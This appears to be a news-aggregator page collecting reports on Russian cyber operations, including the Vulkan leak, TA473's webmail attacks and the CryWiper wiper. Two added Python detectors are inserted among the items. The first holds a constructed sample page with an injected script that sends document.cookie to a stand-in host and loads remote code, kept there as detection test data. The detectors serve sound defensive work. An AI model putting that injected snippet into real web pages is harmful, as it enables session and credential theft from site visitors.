    Russian Cyberwarfare Documents Leaked

    news.movim.eu / Schneier · 2 days ago - 22:00

Now this is interesting:

Thousands of pages of secret documents reveal how Vulkan’s engineers have worked for Russian military and intelligence agencies to support hacking operations, train operatives before attacks on national infrastructure, spread disinformation and control sections of the internet.

The company’s work is linked to the federal security service or FSB, the domestic spy agency; the operational and intelligence divisions of the armed forces, known as the GOU and GRU; and the SVR, Russia’s foreign intelligence organisation.

Lots more at the link.

The documents are in Russian, so it will be a while before we get translations.


    Pro-Russian hackers target elected US officials supporting Ukraine

    news.movim.eu / ArsTechnica · 2 days ago - 12:19


Threat actors aligned with Russia and Belarus are targeting elected US officials supporting Ukraine, using attacks that attempt to compromise their email accounts, researchers from security firm Proofpoint said.

The campaign, which also targets officials of European nations, uses malicious JavaScript that’s customized for individual webmail portals belonging to various NATO-aligned organizations, a report Proofpoint published Thursday said. The threat actor—which Proofpoint has tracked since 2021 under the name TA473—employs sustained reconnaissance and painstaking research to ensure the scripts steal targets’ usernames, passwords, and other sensitive login credentials as intended on each publicly exposed webmail portal being targeted.

Tenacious targeting

“This actor has been tenacious in its targeting of American and European officials as well as military and diplomatic personnel in Europe,” Proofpoint threat researcher Michael Raggi wrote in an email. “Since late 2022, TA473 has invested an ample amount of time studying the webmail portals of European government entities and scanning publicly facing infrastructure for vulnerabilities all in an effort to ultimately gain access to emails of those closely involved in government affairs and the Russia-Ukraine war.”

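The report above describes scripts customised per webmail portal that harvest credentials from the login page. One check a portal operator can run against that class of tampering is a baseline comparison of the script content the login page actually serves. The block below is an added example, not Proofpoint's code and not a signature for TA473's scripts; the sample pages, the host names (webmail.example.gov, static.example.gov, cdn-metrics.example.net) and the baseline hash are constructed for illustration.

```python
"""Baseline check for unexpected script content on a webmail login page.

Added example for the TA473 item above: a defender-side integrity check that
compares the <script> elements served by a webmail portal against a known-good
baseline. It is not Proofpoint's code and is not a signature for TA473's
scripts; the sample pages, host names and baseline below are constructed.
"""
import hashlib
from html.parser import HTMLParser
from urllib.parse import urlparse


class ScriptCollector(HTMLParser):
    """Collect external script URLs, inline script bodies and on* handlers."""

    def __init__(self):
        super().__init__()
        self.external = []      # values of <script src=...>
        self.inline = []        # bodies of <script> without src
        self.handlers = []      # (tag, attribute, value) for onload= etc.
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if name.startswith("on"):
                self.handlers.append((tag, name, value or ""))
        if tag != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_script = True
            self._buf = []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self.inline.append("".join(self._buf))
            self._in_script = False


def inline_hash(body):
    """Hash an inline script body the way the baseline records it."""
    return hashlib.sha256(body.strip().encode("utf-8")).hexdigest()


def audit_login_page(html, portal_host, allowed_hosts, allowed_inline):
    """Return the scripts on the page that the baseline does not cover."""
    p = ScriptCollector()
    p.feed(html)
    p.close()
    findings = {"unexpected_external": [], "unexpected_inline": [], "inline_handlers": p.handlers}
    for src in p.external:
        # A relative src loads from the portal itself; a protocol-relative one does not.
        host = urlparse(src).netloc.lower() or portal_host
        if host not in allowed_hosts:
            findings["unexpected_external"].append(src)
    for body in p.inline:
        if inline_hash(body) not in allowed_inline:
            findings["unexpected_inline"].append(body.strip()[:80])
    return findings


# Constructed baseline and pages (not a real portal).
BASELINE_INLINE = """
document.getElementById("login").addEventListener("submit", function () {
  document.getElementById("go").disabled = true;
});
"""
GOOD_PAGE = """<html><head>
<script src="/js/app.js"></script>
<script src="https://static.example.gov/lib/ui.js"></script>
<script>%s</script>
</head><body>
<form id="login" action="/login" method="post">
<input name="user"><input name="pass" type="password">
<button id="go">Sign in</button></form></body></html>""" % BASELINE_INLINE

# The same page with an injected loader, a cookie-exfiltrating snippet and an onload handler.
TAMPERED_PAGE = GOOD_PAGE.replace(
    "</head>",
    '<script src="//cdn-metrics.example.net/w.js"></script>\n'
    '<script>new Image().src="https://cdn-metrics.example.net/c?"+document.cookie;</script>\n'
    "</head>",
).replace("<body>", '<body onload="fetch(\'https://cdn-metrics.example.net/p\')">')

PORTAL_HOST = "webmail.example.gov"
ALLOWED_HOSTS = {PORTAL_HOST, "static.example.gov"}
ALLOWED_INLINE = {inline_hash(BASELINE_INLINE)}

if __name__ == "__main__":
    for label, page in (("baseline", GOOD_PAGE), ("tampered", TAMPERED_PAGE)):
        print(label, audit_login_page(page, PORTAL_HOST, ALLOWED_HOSTS, ALLOWED_INLINE))
```

Run from a vantage point outside the portal's own network so you see what an external visitor receives; a baseline keyed on inline hashes rather than on script text makes any change to a served script, not only an added one, show up as a finding.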


    Kazakhstan’s seizure of Russian space assets threatens the Soyuz-5 rocket

    news.movim.eu / ArsTechnica · Tuesday, 21 March - 13:02 · 1 minute

[Image: A Russian Proton-M rocket carrying Spain's satellite Amazonas-5 blasts off from the launch pad at the Russian-leased Baikonur cosmodrome in Kazakhstan in 2017. (credit: KIRILL KUDRYAVTSEV/AFP via Getty Images)]

The Soviet Union created the Baikonur Cosmodrome in 1955 to serve as a test site for intercontinental ballistic missiles. A few years later it became the world's first spaceport with the launch of the historic Sputnik 1 and Vostok 1 missions. The sprawling cosmodrome was a mainstay of the Soviet space program.

After the breakup of the Soviet Union, Russia began to lease the spaceport from the government of Kazakhstan and currently has an agreement to use the facilities through the year 2050. Russia pays an annual lease fee of about $100 million. Neither country is particularly happy with the relationship: the Kazakh government feels it is under-compensated, and the Russian government would prefer a launch site on its own territory, which is why it has moved in recent years to build a new spaceport for most of its rockets in the Russian Far East, at Vostochny.

Despite some of this uneasiness, however, the two governments have been working together on future space projects. For example, the main Russian space corporation, Roscosmos, has been developing a new medium-lift rocket that it anticipates launching from Baikonur. This is the Soyuz-5 vehicle, a three-stage rocket powered by RD-171 engines that will burn kerosene fuel. Russia is counting on this vehicle to replace its aging Proton-M rocket and be more cost-competitive with commercial rockets such as SpaceX's Falcon 9 booster.



    Fighting VPN criminalization should be Big Tech’s top priority, activists say

    news.movim.eu / ArsTechnica · Monday, 20 March - 11:00 · 1 minute


“Women, life, freedom” became the protest chant of a revolution still raging in Iran months after a 22-year-old Kurdish woman, Mahsa Amini, died while in custody of morality police. Amini was arrested last September for “improperly” wearing a hijab and violating the Islamic Republic's mandatory dress code laws. Since then, her name has become a viral hashtag invoked by millions of online activists protesting authoritarian regimes around the globe.

In response to Iran's ongoing protests—mostly led by women and young people—Iranian authorities have increasingly restricted Internet access. First, they temporarily blocked popular app stores and indefinitely blocked social media apps like WhatsApp and Instagram. They then implemented sporadic mobile shutdowns wherever protests flared up. Perhaps most extreme, authorities responded to protests in southeast Iran in February by blocking the Internet outright, Al Arabiya reported. Digital and human rights experts say motivations include controlling information, keeping protestors offline, and forcing protestors to use state services where their online activities can be more easily tracked—and sometimes trigger arrests.

As getting online has become increasingly challenging for everyone in Iran—not just protestors—millions have learned to rely on virtual private networks (VPNs) to hide Internet activity, circumvent blocks, and access accurate information beyond state propaganda. Simply put, VPNs work by masking a user's IP address so that governments have a much more difficult time monitoring activity or detecting a user's location. They do this by routing the user's data to the VPN provider's remote servers, making it much harder for an ISP (or a government) to correlate the Internet activity of the VPN provider's servers with the individual users actually engaging in that activity.



    Ukraine Intercepting Russian Soldiers’ Cell Phone Calls

    news.movim.eu / Schneier · Tuesday, 20 December - 23:04

They’re using commercial phones, which go through the Ukrainian telecom network:

“You still have a lot of soldiers bringing cellphones to the frontline who want to talk to their families and they are either being intercepted as they go through a Ukrainian telecommunications provider or intercepted over the air,” said Alperovitch. “That doesn’t pose too much difficulty for the Ukrainian security services.”

[…]

“Security has always been a mess, both in the army and among defence officials,” the source said. “For example, in 2013 they tried to get all the staff at the ministry of defence to replace our iPhones with Russian-made Yoto smartphones.

“But everyone just kept using the iPhone as a second mobile because it was much better. We would just keep the iPhone in the car’s glove compartment for when we got back from work. In the end, the ministry gave up and stopped caring. If the top doesn’t take security very seriously, how can you expect any discipline in the regular army?”

This isn’t a new problem and it isn’t a Russian problem. Here’s a more general article on the problem from 2020.


    CryWiper Data Wiper Targeting Russian Sites

    news.movim.eu / Schneier · Monday, 5 December - 22:38

Kaspersky is reporting on a data wiper masquerading as ransomware that is targeting local Russian government networks.

The Trojan corrupts any data that’s not vital for the functioning of the operating system. It doesn’t affect files with extensions .exe, .dll, .lnk, .sys or .msi, and ignores several system folders in the C:\Windows directory. The malware focuses on databases, archives, and user documents.

So far, our experts have seen only pinpoint attacks on targets in the Russian Federation. However, as usual, no one can guarantee that the same code won’t be used against other targets.

Nothing leading to an attribution.

News article.

Slashdot thread.
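The Kaspersky excerpt above states a clear file-selection rule: binaries and system files are spared, while databases, archives and user documents are the targets. That rule is something endpoint telemetry can be scored against. The block below is an added example, not Kaspersky's code and not a CryWiper signature: it classifies paths by the stated rule and flags a process whose file writes fit it across many directories. The list of "data" extensions, the thresholds and the event records are constructed assumptions, and the whole C:\Windows tree is treated as spared, a simplification of the report's "several system folders".

```python
"""Heuristic for wiper-like file activity of the kind described above.

Added example, not Kaspersky's code and not a CryWiper signature. It encodes
only the selection rule the report states (spare .exe/.dll/.lnk/.sys/.msi and
the Windows directory, hit databases, archives and user documents) and flags a
process whose file writes fit that rule across many directories. The data
extension list, the thresholds and the event records are constructed.
"""
from collections import defaultdict
from pathlib import PureWindowsPath

SPARED_EXT = {".exe", ".dll", ".lnk", ".sys", ".msi"}   # extensions named in the report
DATA_EXT = {                                             # assumed mapping of the report's categories
    ".docx", ".xlsx", ".pdf", ".txt",        # user documents
    ".db", ".sqlite", ".mdf", ".accdb",      # databases
    ".zip", ".rar", ".7z", ".bak",           # archives and backups
}


def classify(path):
    """Category the described selection rule puts a file in."""
    p = PureWindowsPath(path)
    if p.suffix.lower() in SPARED_EXT:
        return "spared_ext"
    parts = [x.lower() for x in p.parts]
    # The report says several folders under C:\Windows are skipped; the whole
    # tree is treated as spared here as a simplification.
    if len(parts) >= 2 and parts[0] == "c:\\" and parts[1] == "windows":
        return "system_dir"
    if p.suffix.lower() in DATA_EXT:
        return "data"
    return "other"


def score_processes(events, min_writes=20, min_data_share=0.9, min_dirs=3):
    """Flag processes whose writes match the wiper's selection rule.

    events: iterable of (pid, image, path) file-write or rename records.
    A process is flagged when it has at least min_writes writes, touched no
    spared executables or Windows files, wrote to at least min_dirs distinct
    directories, and at least min_data_share of its writes hit data files.
    """
    stats = defaultdict(lambda: {"image": "", "total": 0, "data": 0, "spared": 0, "dirs": set()})
    for pid, image, path in events:
        s = stats[pid]
        s["image"] = image
        s["total"] += 1
        cat = classify(path)
        if cat == "data":
            s["data"] += 1
        elif cat in ("spared_ext", "system_dir"):
            s["spared"] += 1
        s["dirs"].add(str(PureWindowsPath(path).parent).lower())
    return {
        pid: s["image"]
        for pid, s in stats.items()
        if s["total"] >= min_writes
        and s["spared"] == 0
        and len(s["dirs"]) >= min_dirs
        and s["data"] / s["total"] >= min_data_share
    }


def sample_events():
    """Constructed file-write records; not real telemetry."""
    ev = []
    names = ["report.docx", "ledger.xlsx", "q3.pdf", "notes.txt", "site.db", "mail.zip", "old.bak"]
    # pid 4120: sweeps documents, databases and archives in every profile folder, no binaries
    for user in ("alice", "bob"):
        for sub in ("Documents", "Desktop", "Downloads"):
            for n in names:
                ev.append((4120, "update.exe", str(PureWindowsPath("C:/Users", user, sub, n))))
    # pid 2210: an installer writing binaries into system locations
    for n in ("a.dll", "b.sys", "c.exe"):
        ev.append((2210, "setup.exe", str(PureWindowsPath("C:/Windows/System32", n))))
        ev.append((2210, "setup.exe", str(PureWindowsPath("C:/Program Files/Tool", n))))
    # pid 3300: a user saving a handful of documents in one folder
    for i in range(5):
        ev.append((3300, "winword.exe", str(PureWindowsPath("C:/Users/alice/Documents", f"draft{i}.docx"))))
    return ev


if __name__ == "__main__":
    print(score_processes(sample_events()))
```

The thresholds are deliberately loose so the rule reads clearly; in production they should be tuned against the host's normal write patterns, and the "no spared files touched" condition alone is not evidence of anything, since backup and sync tools also leave binaries alone. What separates a wiper sweep from those tools in this heuristic is breadth across profile directories combined with writes concentrated on the categories the report names.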


    Russia Creates Malware False-Flag App

    news.movim.eu / Schneier · Wednesday, 20 July, 2022 - 15:32

The Russian hacking group Turla released an Android app that seems to aid Ukrainian hackers in their attacks against Russian networks. It’s actually malware, and provides information back to the Russians:

The hackers pretended to be a “community of free people around the world who are fighting russia’s aggression”—much like the IT Army. But the app they developed was actually malware. The hackers called it CyberAzov, in reference to the Azov Regiment or Battalion, a far-right group that has become part of Ukraine’s national guard. To add more credibility to the ruse they hosted the app on a domain “spoofing” the Azov Regiment: cyberazov[.]com.

[…]

The app actually didn’t DDoS anything, but was designed to map out and figure out who would want to use such an app to attack Russian websites, according to Huntley.

[…]

Google said the fake app wasn’t hosted on the Play Store, and that the number of installs “was minuscule.”

Details from Google’s Threat Analysis Group here.


    Microsoft Issues Report of Russian Cyberattacks against Ukraine

    news.movim.eu / Schneier · Thursday, 28 April, 2022 - 14:15

Microsoft has a comprehensive report on the dozens of cyberattacks — and even more espionage operations — Russia has conducted against Ukraine as part of this war:

At least six Russian Advanced Persistent Threat (APT) actors and other unattributed threats have conducted destructive attacks, espionage operations, or both, while Russian military forces attack the country by land, air, and sea. It is unclear whether computer network operators and physical forces are just independently pursuing a common set of priorities or actively coordinating. However, collectively, the cyber and kinetic actions work to disrupt or degrade Ukrainian government and military functions and undermine the public’s trust in those same institutions.

[…]

Threat groups with known or suspected ties to the GRU have continuously developed and used destructive wiper malware or similarly destructive tools on targeted Ukrainian networks at a pace of two to three incidents a week since the eve of invasion. From February 23 to April 8, we saw evidence of nearly 40 discrete destructive attacks that permanently destroyed files in hundreds of systems across dozens of organizations in Ukraine.